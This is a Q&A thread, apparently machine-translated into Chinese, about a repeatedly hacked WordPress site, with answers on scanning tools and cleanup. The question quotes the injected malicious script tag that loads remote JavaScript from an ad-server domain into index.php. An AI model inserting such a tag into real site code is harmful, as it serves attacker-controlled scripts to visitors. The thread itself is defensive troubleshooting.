的WordPress網站被黑客入侵AGAIN

Question

網站已經破解現在兩次同樣的問題我一直有下載的網站，並做了查找和替換其修復它，但似乎並沒有解決我的問題

這是代碼他們將在WordPress的index.php文件裏面確實有設置爲644

<script language="javascript" src="http://a.doubleadserver.com/?campaignid=135324812&type=tracking"></script> 

我想這也許是SQL注入的權限，因爲所有文件和文件夾鎖定到正確的權限644 755等。

can somebodt tell me a mac SQ L注入測試工具，我可以用它來測試，我已經閱讀了另一篇文章，並且改變了所有的ftp帳戶以保證SFTP的安全，這是他們所缺少的其他東西嗎？

謝謝

Answer 1

這裏有很多工具在這裏有2個部分;在線和下載： http://www.malwarehelp.org/freeware-open-source-commercial-website-security-tools-services-downloads.html

你也可以在你的Mac上使用這個，但它需要基本的Perl安裝。 http://www.cirt.net/nikto2

Answer 2

查找和替換並不是一個很好的方法來解決這個問題，因爲它很容易錯過你不知道專門找到的東西。恢復乾淨備份是最好的方法。使用v防病毒插件可以提供幫助。最後的手段是通過xml導出導出您的內容並從頭開始。 。 。

臨提示：

查找PHP文件，他們不應該，像在上傳文件夾應該只有在那裏的index.php文件夾，它應該只擁有「//沉默是金「c信息在裏面。如果有其他任何PHP文件。 。 。

祝你好運！